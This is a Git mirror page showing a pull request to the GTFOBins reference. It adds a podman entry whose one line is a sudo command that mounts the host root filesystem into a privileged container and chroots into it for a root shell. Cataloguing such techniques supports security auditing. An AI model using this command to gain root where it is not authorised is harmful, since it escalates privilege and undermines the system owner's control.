1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-28 01:56:02 +02:00

Compare commits

...

2 Commits

Author SHA1 Message Date
locaIhost c51f9fc108
Merge 3eb98d5d33 into 4eca50ea16 2023-12-23 17:02:11 +01:00
locaIhost 3eb98d5d33 Add podman 2023-09-25 04:15:34 +02:00

6
_gtfobins/podman.md Normal file
View File

@ -0,0 +1,6 @@
---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---